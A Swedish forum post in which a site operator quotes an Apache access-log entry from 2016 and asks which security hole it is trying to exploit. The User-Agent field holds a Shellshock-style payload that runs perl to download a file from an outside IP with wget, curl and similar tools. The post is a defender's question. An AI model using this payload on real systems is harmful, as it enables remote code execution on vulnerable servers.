Sista parametern i loggen är User-Agent. Personen försöker mao skicka exekverbar kod i den. Jag har mycket svårt att se att Apache2 eller någon webserver skulle försöka exekvera user-agent-strängen som kod.202.78.94.70 - [13/Jan/2016:22:48:36 -0800] "GET / HTTP/1.1" 200 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe ... 30_192.png ; curl -O http://204.232.209.188/images/freshcafe ... 30_192.png ; fetch http://204.232.209.188/images/freshcafe ... 30_192.png ; lwp-download http://204.232.209.188/images/freshcafe ... 30_192.png ; GET http://204.232.209.188/images/freshcafe ... 30_192.png ; lynx http://204.232.209.188/images/freshcafe ... 30_192.png \");'"
Jag har sökt på nätet efter detta men inte hittat något. Är detta någon som vet vad det är för säkerhetshål han försöker utnyttja, jag har svårt att se att det skulle fungera med Apache, men det kanske rör sig om någon random-hemma-router som har det.